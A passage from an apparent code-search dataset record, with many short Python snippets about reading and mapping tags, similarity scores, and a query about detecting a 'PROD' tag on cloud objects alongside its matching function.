return f'({variable_tagUnknown}{self.label}'+ \\\n \"{\" + f'{self.databaseInfoTag[\"properties\"][\"keyword\"]}:\\'{self.keyword}\\'' + \"})\"", "def filter_tag(tags=None):\n tagdict = defaultdict(list)\n Besarkecil = lambda f: ' '.join(re.findall('[A-Z][^A-Z]*', f))\n for obj in list(tags):\n if len(obj.split(':')) == 2:\n k, v = obj.split(':')\n # filtering key Besarkecil, lowercase\n k = str(Besarkecil(k)).lower()\n # print(k)\n if k in ['cari', 'jadwal', 'keberangkatan', 'maskapai', 'type', 'ibadah', 'jumlah hari', 'rute', 'tour']:\n res = re.findall(r\"(^[A-Z][^A-Z]+)|([^\\W\\d_]+|[\\d+]+)\", v)\n arres = []\n for resple in res:\n arres.append(filter(None, resple)[0])\n # print([e for e in resple])\n # print(' '.join(arres))\n tagdict[k].append(' '.join(arres))\n return tagdict", "def get_tag_value_or_none(node, element_name):\n tag_value = node.tags.get(element_name, 'n/a')\n\n if 'n/a' == tag_value:\n return None\n\n return tag_value", "def filter_tag(tags=None):\n tagdict = defaultdict(list)\n Besarkecil = lambda f: ' '.join(re.findall('[A-Z][^A-Z]*', f))\n for obj in list(tags):\n if len(obj.split(':')) == 2:\n k, v = obj.split(':')\n # filtering key Besarkecil, lowercase\n k = str(Besarkecil(k)).lower()\n # print(k)\n if k in ['cari', 'jadwal', 'keberangkatan', 'maskapai', 'type', 'ibadah', 'jumlah hari', 'rute',\n 'tour']:\n res = re.findall(r\"(^[A-Z][^A-Z]+)|([^\\W\\d_]+|[\\d+]+)\", v)\n arres = []\n for resple in res:\n arres.append(filter(None, resple)[0])\n # print([e for e in resple])\n # print(' '.join(arres))\n tagdict[k].append(' '.join(arres))\n return tagdict", "def getOptionalTag(node, tag, option=\"\"):\n try:\n return getTag(node, tag)\n except TagError:\n return option", "def tag_word(self, w):\n return self._default_tag", "def tag_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tag_value\")", "def kwextract(s):\n try:\n return strip(s, \"$\").strip().split(\": \")[1]\n except IndexError:\n return \"<unknown>\"", "def cypher_naTag_keyword(self, variable_tagNA=\"na_tag\"):\n\n if not self.keyword:\n return \"\"\n return f'({variable_tagNA}{self.label}' + \\\n \"{\" + f'{self.databaseInfoTag[\"properties\"][\"keyword\"]}:\"{self.keyword}\"' + \"})\"", "def gettag(query, lemmatag = False):\n import re\n if lemmatag is False:\n tag = 'n' # same default as wordnet\n # attempt to find tag from tregex query\n tagfinder = re.compile(r'^[^A-Za-z]*([A-Za-z]*)')\n tagchecker = re.compile(r'^[A-Z]{1,4}$')\n treebank_tag = re.findall(tagfinder, query.replace(r'\\w', '').replace(r'\\s', '').replace(r'\\b', ''))\n if re.match(tagchecker, treebank_tag[0]):\n if treebank_tag[0].startswith('J'):\n tag = 'a'\n elif treebank_tag[0].startswith('V') or treebank_tag[0].startswith('M'):\n tag = 'v'\n elif treebank_tag[0].startswith('N'):\n tag = 'n'\n elif treebank_tag[0].startswith('R'):\n tag = 'r'\n elif lemmatag:\n tag = lemmatag\n tagchecker = re.compile(r'^[avrn]$')\n while not re.match(tagchecker, lemmatag):\n time = strftime(\"%H:%M:%S\", localtime())\n selection = raw_input('\\n%s: WordNet POS tag \"%s\" not recognised.\\n It must be:\\n\\n ' \\\n ' a: (adjective)' \\\n ' n: (noun)' \\\n ' r: (adverb)' \\\n ' v: (verb)\\n\\nYour selection: ' % (time, lemmatag))\n lemmatag = selection\n return tag", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"stitch\":\n return \"NewStitch\"\n return key", "def keep(tag):\n if tag.name != 'span':\n return\n if tag.parent.has_attr('class'):\n for c in tag.parent['class']:\n if 'example' in c:\n return\n\n if tag.has_attr('class'):\n if 'types' in tag['class']:\n if 'customTracks' not in tag['class']:\n return True", "def _tag_of(entry: _LexiconEntry) -> str:\n return entry[\"tag\"].upper()", "def get_value(soup, tag, cond, default=None):\r\n ele = soup.find(tag, cond)\r\n if ele:\r\n return ele.text.strip()\r\n return default", "def __getitem__(self, tag):\n return self.__tags.get(tag.lower(), 0)", "def word_tag(self, word):\n if word[1] in (\"NN\", \"NNS\", \"NNP\", \"NNPS\"):\n return _wordnet.NOUN\n if word[1] in (\"JJ\", \"JJR\", \"JJS\"):\n return _wordnet.ADJ\n if word[1] in (\"VB\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\"):\n return _wordnet.VERB\n if word[1] in (\"RB\", \"RBR\", \"RBS\"):\n return _wordnet.ADV\n\n return None", "def mapping(tag):\n\n return gvars.METAINFO['tag_map'][tag.replace('1', '')]", "def _get_xml_tag(doc):\n tag = type(doc).type_key.split('.')[3]\n tag = convert.str_to_camel_case(tag)\n\n return tag", "def get_tag_value(\n service: str,\n tags: List[Any],\n tag_key: str,\n) -> str:\n capitalize = capitalize_tag_kv(service)\n matches = [\n t[f\"{'V' if capitalize else 'v'}alue\"]\n for t in tags\n if t[f\"{'K' if capitalize else 'k'}ey\"] == tag_key\n ]\n if len(matches) != 1:\n log_error(\n f\"Oops it looks like we're unable to find a match for tag {tag_key}.\"\n \"Please open an issue to help us get this fixed!\",\n )\n raise Abort()\n\n return matches[0]", "def tag(self,name):\n return self._tags.get(name,None)", "def get_keyword(package):\n\ttry:\n\t\tsubstr = re.search(r'(\\S+)_(\\S+)', package)\n\t\tif substr:\n\t\t\treturn substr.groups()\n\texcept Exception,e:\n\t\tlog.error(str(e))\n\t\treturn None", "def get_suggested(schema, key):\n for k in schema.keys():\n if k == key:\n if k.description is None or \"suggested_value\" not in k.description:\n return None\n return k.description[\"suggested_value\"]", "def get_asg_tag(tags, tag_name):\n result = {}\n for tag in tags:\n for key, val in tag.items():\n if val == tag_name:\n result = tag\n return result", "def unknown_starttag(self, tag, attrs):\n if tag in self.valid_tags:\n self.result.append('<' + tag)\n for k, v in attrs:\n if string.lower(k[0:2]) != 'on' and", "def getDbStrNo(self, db, key):\n value = self.getDbStr(db, key)\n if value == \"no\":\n return None\n else:\n return value", "def tag(self,name):\n try:\n return self.doc.getElementsByTagName(name)[0].firstChild.wholeText\n except IndexError:\n # Check for a hash tag with legacy API\n if name in ['md5','sha1','sha256']:\n for e in self.doc.getElementsByTagName('hashdigest'):\n if e.getAttribute('type').lower()==name:\n return e.firstChild.wholeText\n raise KeyError,name+\" not in XML\"", "def get_tag(self, tag_type: str) -> str:\n if tag_type in self.tags:\n return self.tags[tag_type]\n return None", "def retagger(tags):\n if tags == 'Positive':\n return 'pos'\n else:\n return 'neg'", "def isImportantToken(self, token, ignoreSemanticTagList=[]):\n if len(ignoreSemanticTagList) > 0: \n tags = token.getSemanticTagMatches(ignoreSemanticTagList)\n else:\n tags = []\n return token.isSymbol() == False \\\n and token.text not in self.ignoreWords and len(tags) == 0", "def intf_TAGNOTQUERY(E):\n if not inc.TXT_or_LST_of_TXTs(E.The,1):\n print(\"Input Error: nottag?\")\n print(intf_TAGNOTQUERY.__doc__)\n return # Without doing much of anything.\n mytags= E.The.StackPop().val\n if type(mytags)==type(list()):\n #mytags= map(lambda x:x.val, mytags) # Should now be a list of TXTs.\n mytags= [x.val for x in mytags] # Should now be a list of TXTs.\n else:\n mytags= [ mytags ] # Also a (1 item) list of ints.\n disqualifying_ents= list()\n for myeid in MMEL.El.keys():\n atagishere= False # Assume they're here until one is not found.\n for mytag in mytags:\n #print(\"Searching entity #%d for tag ''%s''\" % (myeid,mytag))\n if MMEL.El[myeid].has_tag(mytag):\n atagishere= True\n break\n if atagishere:\n disqualifying_ents.append( myeid )\n qualifying_ents= list() # For inverting.\n for myeid in MMEL.El.keys(): # Go through all ents again.\n if myeid not in disqualifying_ents: # Add ones not found before.\n qualifying_ents.append(myeid)\n # Objectify remaining.\n qualifying_ents= [objectifier.StackOB_VAL(m) for m in qualifying_ents] \n E.The.StackPush( objectifier.StackOB_LST(qualifying_ents) )", "def get_tag(self, xaf, name, not_found_value=None,\n counter_str_value='latest', force_step_name=None,\n force_plugin_name=None):\n tag_name = self.__get_tag_name(name, counter_str_value,\n force_step_name, force_plugin_name)\n return xaf.tags.get(tag_name, not_found_value)", "def get_tag(self, scope, key):\r\n print 'GETTING', scope, key, self._tags\r\n return self._tags[scope].get(key)", "def _get_tagged_value(self, key):\n return self._tagged_values_dict[key]", "def get_suggested(schema, key):\n for k in schema:\n if k == key:\n if k.description is None or \"suggested_value\" not in k.description:\n return None\n return k.description[\"suggested_value\"]\n # Wanted key absent from schema\n raise Exception", "def _extract_latest_from_search_triple(\n triple: Tuple[str, str, str]\n) -> Optional[str]:\n description, installed, latest = triple\n if re_test(r'\\s*ballet \\(.+\\)\\s*-\\s*\\w*', description):\n if 'INSTALLED' in installed and 'LATEST' in latest:\n return re_find(r'\\s*LATEST:\\s*(.+)', latest)\n return None", "def _find(self, keyword):\n for tag in self.meta.findall(CN('meta:keyword')):\n if keyword == tag.text:\n return tag\n return None", "def map_postags(treebank_tag):\n\n if treebank_tag.startswith('J'):\n return \"a\"\n elif treebank_tag.startswith('V'):\n return \"v\"\n elif treebank_tag.startswith('N'):\n return \"n\"\n elif treebank_tag.startswith('R'):\n return \"r\"\n else:\n return 'n'", "def safe_extract(extracted_tag, replacement_value = None):\n try:\n value = extracted_tag.text\n except:\n value = replacement_value\n\n return value", "def getKeyword(self, key):\n try:\n return self.raw[0].header[key]\n except:\n return self.raw[0].header['HIERARCH ESO '+key]", "def _text_or_none(root, tag):\n elem = root.find(tag)\n return None if elem is None else elem.text", "def should_tag_enis(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"should_tag_enis\")", "def get_tag(tag):\r\n from tagging.models import Tag\r\n if isinstance(tag, Tag):\r\n return tag\r\n\r\n try:\r\n if isinstance(tag, types.StringTypes):\r\n return Tag.objects.get(name=tag)\r\n elif isinstance(tag, (types.IntType, types.LongType)):\r\n return Tag.objects.get(id=tag)\r\n except Tag.DoesNotExist:\r\n pass\r\n\r\n return None", "def POStag(self, word):\n \t\tif word in (\"'\",\",\",\".\",':',';','.'):\n \t\t\ttag = 'PUNCT'\n \t\telif word == '-':\n \t\t\ttag = 'DASH'\n \t\telse:\n \t\t\ttag = 'NOTAG'\n \t\treturn tag", "def tagged(self):\n v = self[3]\n return (v >> 5 & 0b1) != 0", "def _get_tag(self):\n return self.__tag", "def extract(data, key):\n for d in data:\n if d.startswith(key):\n return d.replace(key+':','').strip() #remove the parser tag then remove the spaces", "def get_did_you_know():\r\n\tdid_you_know = Highlight.objects.filter(tags='dyk').order_by('?')\r\n\tif did_you_know != '':\r\n\t\treturn {'did_you_know': did_you_know}\r\n\telse:\r\n\t\treturn ''", "def get_default_tag(self, tags):\n tags_counter = Counter()\n for tag in tags:\n tags_counter[tag] += 1\n\n if len(tags_counter) == 2 and list(tags_counter.values())[0] == list(tags_counter.values())[1]:\n return ut.find_positive_tag(tags_counter.keys())\n\n return tags_counter.most_common(1)[0][0]", "def _nonkey():\n def not_key(s):\n return not (lexer.singularize(s.lower()) in pattern_key)\n def p(tok):\n return tok.type == 'WORD' and not_key(tok.value)\n return next_word().if_test(p)", "def get_tag(self, key):\n return self._entries[key]", "def find_info( attr, kw, metadata, default='' ):\n str_attr = str(attr)\n return kw.get( str_attr, metadata.get( str_attr, default ) )", "def get_wordnet_pos(tag):\n tag_dict = {\"J\": wordnet.ADJ,\n \"N\": wordnet.NOUN,\n \"V\": wordnet.VERB,\n \"R\": wordnet.ADV}\n\n return tag_dict.get(tag.upper(), wordnet.NOUN)", "def name_highway_key(tags):\r\n if 'name' not in tags:\r\n return None\r\n\r\n if 'highway' not in tags:\r\n return None\r\n \r\n if not tags['name'] or not tags['highway']:\r\n return None\r\n \r\n return tags['name'], tags['highway']", "def is_ignore(self):\n return self._tag == 'ignore'", "def findPOS(word):\r\n\t\r\n lisPOS = list(wordtags[word])\r\n if \"ADJ\" in lisPOS:\r\n return \"ADJECTIVE\"\r\n if \"ADV\" in lisPOS:\r\n return \"ADVERB\"\r\n if \"NOUN\" in lisPOS:\r\n return \"NOUN\"", "def get_tag(self, tag_name):\n tag_values = []\n for tag in self.tags:\n if tag.tag_name == tag_name:\n tag_values.append(tag.tag_value)\n\n if len(tag_values) == 1:\n if tag_values[0].lower() == 'true':\n return True\n elif tag_values[0].lower() == 'false':\n return False\n else:\n return tag_values[0]\n elif len(tag_values) > 1:\n return tag_values\n else:\n return False", "def get_tag(self, tag_name):\n tag_values = []\n for tag in self.tags:\n if tag.tag_name == tag_name:\n tag_values.append(tag.tag_value)\n\n if len(tag_values) == 1:\n if tag_values[0].lower() == 'true':\n return True\n elif tag_values[0].lower() == 'false':\n return False\n else:\n return tag_values[0]\n elif len(tag_values) > 1:\n return tag_values\n else:\n return False", "def get(self, tagname):\n return self.tags.setdefault(tagname, ModelTag(tagname))", "def _get_lsp_config_isis_ignore_metric(self):\n return self.__lsp_config_isis_ignore_metric", "def network_ref_modifier_key(tags):\r\n if 'network' not in tags:\r\n return None\r\n\r\n if 'ref' not in tags:\r\n return None\r\n \r\n if not tags['network'] or not tags['ref']:\r\n return None\r\n \r\n return tags['network'], tags['ref'], tags.get('modifier', '')", "def tag_condition(self):\n return self._tag_condition", "def is_explicit(self) -> bool:\r\n return EXPLICIT_TAG in self._item[\"tags\"]", "def nic_tag_type(self):\n # return type of the nictag or empty string if self.nic_tag is not found in Node.all_nictags\n return Node.all_nictags().get(self.nic_tag, '')", "def get_flag(self):\n price_data = self.get_price_data()\n if price_data.get('flag'):\n return price_data.get('flag')\n return None", "def tag_policy(self) -> Optional[pulumi.Input['MonitorConfigPolicyTagPolicyArgs']]:\n return pulumi.get(self, \"tag_policy\")", "def tag_policy(self) -> Optional[pulumi.Input['MonitorConfigPolicyTagPolicyArgs']]:\n return pulumi.get(self, \"tag_policy\")", "def tag(self) -> str:\n return pulumi.get(self, \"tag\")", "def get_tag_context(self, ctx, tag_name):\n # We want the error to fall through if the global tags don't work.\n if self.config.hexists(\"config:tags:global\", tag_name):\n return \"global\"\n\n if not isinstance(ctx.message.channel, DMChannel):\n try:\n if self.config.hexists(\"guild:{}:tags\".format(ctx.message.guild.id), tag_name):\n return \"guild\"\n except RedisError:\n pass\n\n try:\n if self.config.hexists(\"chan:{}:tags\".format(ctx.message.channel.id), tag_name):\n return \"chan\"\n else:\n return None\n except RedisError:\n return None", "def unknown(self, w):\n return not(w in self.word_tags)", "def get(self, key: str, default: Optional[str] = None) -> Optional[str]:\n if key == \"Dinosaur\":\n return \"NewDinosaur\"\n return key", "def _getatt(attrs, key, ns=None, default=None):\n keytuple = (ns, unicode(key))\n if attrs.has_key(keytuple):\n result = attrs[keytuple]\n else:\n result = default\n return result", "def get_unknown_opttrans_attr(path):\n path_attrs = path.pathattr_map\n unknown_opt_tran_attrs = {}\n for _, attr in path_attrs.items():\n if (isinstance(attr, BGPPathAttributeUnknown) and\n attr.flags & (BGP_ATTR_FLAG_OPTIONAL |\n BGP_ATTR_FLAG_TRANSITIVE)) or \\\n isinstance(attr, BGPPathAttributeAs4Path) or \\\n isinstance(attr, BGPPathAttributeAs4Aggregator):\n unknown_opt_tran_attrs[attr.type] = attr\n\n return unknown_opt_tran_attrs", "def unknown_starttag(self, tag, attrs):\n if tag in self.valid_tags:\n self.result = self.result + '<' + tag\n for k, v in attrs:\n if (string.lower(k[0:2]) != 'on' and\n string.lower(v[0:10]) != 'javascript'):\n self.result = '%s %s=\"%s\"' % (self.result, k, v)\n endTag = '</%s>' % tag\n self.endTagList.insert(0, endTag)\n self.result = self.result + '>'", "def start_tag_or_none(self, token):\n if self.patterns['start_tag'].match(token):\n return token[2:-6].upper()", "def ignoretag(self, node):\n return self.construct_mapping(node)", "def _get_tag(self, tag):\n return self.prefix + tag", "def ner_tag_advertise(self, advertise: Dict[str, Any]):\n tmp_ad = advertise.copy()\n full_str: str = sc.debug_print(\n self.splitting_marking(text_input=tmp_ad[\"clean_text\"],\n ner_map=self.non_measure_map,\n measure_map=self.measure_map), self.debug)\n\n terms_input: List[str] = sc.debug_print(\n [self.reg_rules[\"ngram_clear_rgx\"].sub(\"\", word[0])\n for word in self.reg_rules[\"ngram_rgx\"].findall(full_str)], self.debug)\n\n model_input: [(str, (str, ...))] = sc.debug_print(self.get_tagged_sequence(terms_input), self.debug)\n\n # Build conflict dictionary\n clean_inputs: [(str, str)] = []\n conflict_words = dict()\n for word, ne in model_input:\n if len(ne) > 1:\n if word in conflict_words.keys():\n for tag in ne:\n conflict_words[word].add(tag)\n else:\n conflict_words[word] = {*ne}\n clean_inputs.append((word, random.choice(ne)))\n else:\n clean_inputs.append((word, ne[0]))\n\n tmp_ad[\"NER\"] = clean_inputs\n return tmp_ad", "def safely_get_data(element, key):\n try:\n for child in element:\n if child.tag == key:\n return child.text\n except:\n return \"not found\"", "def get_jurisdiction_flag(data: dict) -> str:\n try:\n within_juris = data[\"event\"][\"data\"][\"new\"][\"austin_full_purpose\"] == \"Y\"\n return \"Y\" if within_juris else \"N\"\n except (TypeError, KeyError):\n return \"N\"", "def getValue(tree, tag):\n try:\n return tree.find(tag).text\n except AttributeError:\n return None", "def filter_gt_firsttag(ground_truth):\n gt = {}\n for k, v in ground_truth.items():\n gt[k] = [v[0]]\n\n return gt", "def extract_gi_id(description):\n fields = description[1:].split('|')\n if 'gi' not in fields:\n return None\n return fields[1 + fields.index('gi')]", "def convert(tag):\r\n if is_noun(tag):\r\n return wn.NOUN\r\n if is_adjective(tag):\r\n return wn.ADJ", "def tag(self) -> 'Tag':\n # project/lineage must exist so let's fetch it outside of try-except\n project = self.project.key\n lineage = self.lineage.key\n try:\n generation = self.key\n except self.Listing.Empty: # generation doesn't exist\n LOGGER.debug('No previous generations found - using a null tag')\n return NOTAG\n return TAGS(self.registry, project, lineage, generation)", "def cypher_tag_keyword(self, variable_tag=\"tag\"):\n if not self.keyword:\n return \"\"\n return f'({variable_tag}{self.label}' + \\\n \"{\" + f'{self.databaseInfoTag[\"properties\"][\"keyword\"]}:\\'{self.keyword}\\'' + \"})\"", "def get_tag_class(stext, tag_=\"pre\"):\n if \"<\" + tag_ + \" class=\" in stext and \">\" in stext:\n sclass = stext.split('=')[1]\n sclass = sclass[:sclass.index('>')]\n if \"'\" in sclass:\n sclass = sclass.replace(\"'\", '')\n elif '\"' in sclass:\n sclass = sclass.replace('\"', '')\n else:\n sclass = \"\"\n return sclass", "def tag(self):\n return self._tag", "def filter_gt(ground_truth, tokeep):\n gt = {}\n for k, v in ground_truth.items():\n tags = []\n for t, w in v:\n if t in tokeep:\n tags.append([t, w])\n if tags:\n gt[k] = tags\n\n return gt", "def get(self, key):\n return \"\"", "def out_prob(self, word, tag):\n return self._out.get(tag, {}).get(word, 0)" ]
[ "0.80788904", "0.5658676", "0.550251", "0.54886025", "0.53662133", "0.53030056", "0.52832705", "0.5201634", "0.51524514", "0.5135101", "0.51192683", "0.5106311", "0.5085387", "0.50634223", "0.50538707", "0.5035368", "0.49847323", "0.4977521", "0.49762967", "0.49733838", "0.49426636", "0.49417284", "0.4923227", "0.49155444", "0.4910193", "0.49023953", "0.48983893", "0.48889503", "0.4886947", "0.48731405", "0.48656043", "0.4856606", "0.4850074", "0.4847536", "0.4846674", "0.4833651", "0.48140973", "0.48041105", "0.47915995", "0.47907677", "0.47873417", "0.47631544", "0.4760686", "0.47550023", "0.47493812", "0.47464025", "0.47291413", "0.47206864", "0.47193947", "0.47139356", "0.47082755", "0.47009566", "0.46883738", "0.46727273", "0.46641353", "0.4660467", "0.46550825", "0.4650711", "0.4649755", "0.46417767", "0.4640409", "0.463057", "0.46284664", "0.46238855", "0.46193042", "0.46177393", "0.46177393", "0.46139956", "0.460673", "0.4605933", "0.45908666", "0.45907122", "0.4579428", "0.45790648", "0.45733443", "0.45733443", "0.45637316", "0.45588952", "0.45377848", "0.45328695", "0.45275876", "0.45240888", "0.45086887", "0.45085832", "0.4501207", "0.45005253", "0.4493115", "0.44913924", "0.44909558", "0.4488102", "0.4487159", "0.4481208", "0.44775364", "0.44768116", "0.44755086", "0.44711968", "0.44681373", "0.44603112", "0.44538096", "0.44530153" ]
0.8014554
1
Returns true if the object (instance, volume, snapshot, AMI) has a tag with 'PROD' for key
def isProduction(obj): return 'PROD' in obj.tags # This is deprecated? obj.tags.has_key('PROD')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tag_key_exists(self, key):\n return key in self.map", "def hastag(obj, key):\n key = TAG_PREFIX + key\n if not isinstance(obj, unittest.TestCase):\n return hasattr(obj, key)\n tc_method = getattr(obj, obj._testMethodName)\n return hasattr(tc_method, key) or hasattr(obj, key)", "def is_attribute(tag, kmip_version=None):\n kmip_1_0_attribute_tags = [\n Tags.UNIQUE_IDENTIFIER,\n Tags.NAME,\n Tags.OBJECT_TYPE,\n Tags.CRYPTOGRAPHIC_ALGORITHM,\n Tags.CRYPTOGRAPHIC_LENGTH,\n Tags.CRYPTOGRAPHIC_PARAMETERS,\n Tags.CRYPTOGRAPHIC_DOMAIN_PARAMETERS,\n Tags.CERTIFICATE_TYPE,\n Tags.CERTIFICATE_IDENTIFIER,\n Tags.CERTIFICATE_SUBJECT,\n Tags.CERTIFICATE_ISSUER,\n Tags.DIGEST,\n Tags.OPERATION_POLICY_NAME,\n Tags.CRYPTOGRAPHIC_USAGE_MASK,\n Tags.LEASE_TIME,\n Tags.USAGE_LIMITS,\n Tags.STATE,\n Tags.INITIAL_DATE,\n Tags.ACTIVATION_DATE,\n Tags.PROCESS_START_DATE,\n Tags.PROTECT_STOP_DATE,\n Tags.DEACTIVATION_DATE,\n Tags.DESTROY_DATE,\n Tags.COMPROMISE_OCCURRENCE_DATE,\n Tags.COMPROMISE_DATE,\n Tags.REVOCATION_REASON,\n Tags.ARCHIVE_DATE,\n Tags.OBJECT_GROUP,\n Tags.LINK,\n Tags.APPLICATION_SPECIFIC_INFORMATION,\n Tags.CONTACT_INFORMATION,\n Tags.LAST_CHANGE_DATE,\n Tags.CUSTOM_ATTRIBUTE\n ]\n kmip_1_1_attribute_tags = copy.deepcopy(kmip_1_0_attribute_tags) + [\n Tags.CERTIFICATE_LENGTH,\n Tags.X_509_CERTIFICATE_IDENTIFIER,\n Tags.X_509_CERTIFICATE_SUBJECT,\n Tags.X_509_CERTIFICATE_ISSUER,\n Tags.DIGITAL_SIGNATURE_ALGORITHM,\n Tags.FRESH\n ]\n kmip_1_2_attribute_tags = copy.deepcopy(kmip_1_1_attribute_tags) + [\n Tags.ALTERNATIVE_NAME,\n Tags.KEY_VALUE_PRESENT,\n Tags.KEY_VALUE_LOCATION,\n Tags.ORIGINAL_CREATION_DATE\n ]\n kmip_1_3_attribute_tags = copy.deepcopy(kmip_1_2_attribute_tags) + [\n Tags.RANDOM_NUMBER_GENERATOR\n ]\n kmip_1_4_attribute_tags = copy.deepcopy(kmip_1_3_attribute_tags) + [\n Tags.PKCS12_FRIENDLY_NAME,\n Tags.DESCRIPTION,\n Tags.COMMENT,\n Tags.SENSITIVE,\n Tags.ALWAYS_SENSITIVE,\n Tags.EXTRACTABLE,\n Tags.NEVER_EXTRACTABLE\n ]\n kmip_2_0_attribute_tags = copy.deepcopy(kmip_1_4_attribute_tags) + [\n Tags.CERTIFICATE_SUBJECT_CN,\n Tags.CERTIFICATE_SUBJECT_O,\n Tags.CERTIFICATE_SUBJECT_OU,\n Tags.CERTIFICATE_SUBJECT_EMAIL,\n Tags.CERTIFICATE_SUBJECT_C,\n Tags.CERTIFICATE_SUBJECT_ST,\n Tags.CERTIFICATE_SUBJECT_L,\n Tags.CERTIFICATE_SUBJECT_UID,\n Tags.CERTIFICATE_SUBJECT_SERIAL_NUMBER,\n Tags.CERTIFICATE_SUBJECT_TITLE,\n Tags.CERTIFICATE_SUBJECT_DC,\n Tags.CERTIFICATE_SUBJECT_DN_QUALIFIER,\n Tags.CERTIFICATE_ISSUER_CN,\n Tags.CERTIFICATE_ISSUER_O,\n Tags.CERTIFICATE_ISSUER_OU,\n Tags.CERTIFICATE_ISSUER_EMAIL,\n Tags.CERTIFICATE_ISSUER_C,\n Tags.CERTIFICATE_ISSUER_ST,\n Tags.CERTIFICATE_ISSUER_L,\n Tags.CERTIFICATE_ISSUER_UID,\n Tags.CERTIFICATE_ISSUER_SERIAL_NUMBER,\n Tags.CERTIFICATE_ISSUER_TITLE,\n Tags.CERTIFICATE_ISSUER_DC,\n Tags.CERTIFICATE_ISSUER_DN_QUALIFIER,\n Tags.KEY_FORMAT_TYPE,\n Tags.NIST_KEY_TYPE,\n Tags.OPAQUE_DATA_TYPE,\n Tags.PROTECTION_LEVEL,\n Tags.PROTECTION_PERIOD,\n Tags.PROTECTION_STORAGE_MASK,\n Tags.QUANTUM_SAFE,\n Tags.SHORT_UNIQUE_IDENTIFIER,\n Tags.ATTRIBUTE\n ]\n kmip_2_0_attribute_tags.remove(Tags.CERTIFICATE_IDENTIFIER)\n kmip_2_0_attribute_tags.remove(Tags.CERTIFICATE_SUBJECT)\n kmip_2_0_attribute_tags.remove(Tags.CERTIFICATE_ISSUER)\n kmip_2_0_attribute_tags.remove(Tags.OPERATION_POLICY_NAME)\n kmip_2_0_attribute_tags.remove(Tags.CUSTOM_ATTRIBUTE)\n\n if kmip_version == KMIPVersion.KMIP_1_0:\n return tag in kmip_1_0_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_1_1:\n return tag in kmip_1_1_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_1_2:\n return tag in kmip_1_2_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_1_3:\n return tag in kmip_1_3_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_1_4:\n return tag in kmip_1_4_attribute_tags\n elif kmip_version == KMIPVersion.KMIP_2_0:\n return tag in kmip_2_0_attribute_tags\n else:\n all_attribute_tags = set(\n kmip_1_0_attribute_tags +\n kmip_1_1_attribute_tags +\n kmip_1_2_attribute_tags +\n kmip_1_3_attribute_tags +\n kmip_1_4_attribute_tags +\n kmip_2_0_attribute_tags\n )\n return tag in all_attribute_tags", "def tag_dict_contains (self,\r\n tag):\r\n\r\n\r\n\r\n if self.using_database:\r\n aprint('TAGDICT CONTAINS')\r\n value_tuple = (notebookname, tag,)\r\n db_cursor.execute(\"SELECT rowid \"\r\n +\"FROM tags_to_keys\"\r\n +\" WHERE notebook=?\"\r\n +\" AND tag=?;\",\r\n value_tuple)\r\n try:\r\n return db_cursor.fetchone()[0] # MIGHT BE PROBLEMATIC\r\n except:\r\n return False\r\n\r\n return str(tag) in self.tag_dict", "def _is_incex_key(self, key, value):\n key_out = ((self.included_attributes and\n (key not in self.included_attributes)) or\n (key in self.excluded_attributes))\n value_out = True\n if isinstance(value, dict):\n for change_key in value:\n if isinstance(value[change_key], dict):\n for key in value[change_key]:\n if ((self.included_attributes and\n (key in self.included_attributes)) or\n (key not in self.excluded_attributes)):\n value_out = False\n return key_out and value_out", "def prod(environment):\n return environment == 'live' or environment == 'debug' or environment == 'prod'", "def can_tag(self):\n try:\n self.cork.require(role='beta-archivist')\n return True\n except Exception:\n return False", "def is_tagged(self, instance_id, tag_name):\n tag_value = self.get_tag_for_instance(instance_id, tag_name)\n if tag_value is not None and tag_value == 'true':\n return True\n else:\n return False", "def has_attribute(self, key):\n return key in self.__dict", "def _does_product_contains_given_attributes(self, product, *attrs):\n\n for attribute in list(attrs[0]):\n if not product.get(attribute):\n return False\n\n return True", "def contains(self, key):\n try:\n self.keyvaluepair_set.get(key=key)\n return True\n except KeyValuePair.DoesNotExist:\n return False", "def __contains__(self, key):\n return key in self._tagged_values_dict and self._is_visible(key)", "def __contains__(self, key):\n return key in self._group._opts", "def has_tag(self, tag):\n return tag in self.tags", "def has_tag(self, tag):\n return tag in self.tags", "def is_tagged(self,tag_name,element):\n return (tag_name in self.tag2elements.keys()) and (element in self.tag2elements[tag_name])", "def has_attr(self, key):\n return key in self.attrs", "def has(self, key):", "def __contains__(self, key):\n return key in self._get_storage()", "def is_tag_available(self, tag):\n return tag in self.available_tags", "def check_if_app_engine_job(tagkey, tagvalue):\n\n if (tagkey == '@app_engine_flex') and (':' in tagvalue):\n return True\n else:\n return False", "def IsTagExists(self, ResourceId, TagName):\n\n try:\n if self.Service == 'ec2':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 's3':\n response = self.GetBucketTagging(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['TagSet']])):\n return True\n elif self.Service == 'lambda':\n response = self.ListTags(ResourceId)\n if TagName in [x for x in response['Tags']]:\n return True\n elif self.Service == 'logs':\n response = self.ListTagsLogGroup(ResourceId)\n if TagName in [x for x in response['tags']]:\n return True\n elif self.Service == 'rds':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['TagList']])):\n return True\n elif self.Service == 'es':\n response = self.ListTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['TagList']])):\n return True\n elif self.Service == 'emr':\n response = self.DescribeCluster(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [Tag for Tag in response['Cluster']['Tags']])):\n return True\n elif self.Service == 'dynamodb':\n response = self.ListTagsOfResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'firehose':\n response = self.ListTagsForDeliveryStream(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'glacier':\n response = self.ListTagsForVault(ResourceId)\n if TagName in [x for x in response['Tags']]:\n return True\n elif self.Service == 'kms':\n response = self.ListResourceTags(ResourceId)\n if TagName in list(map(lambda x: x['TagKey'], [x for x in 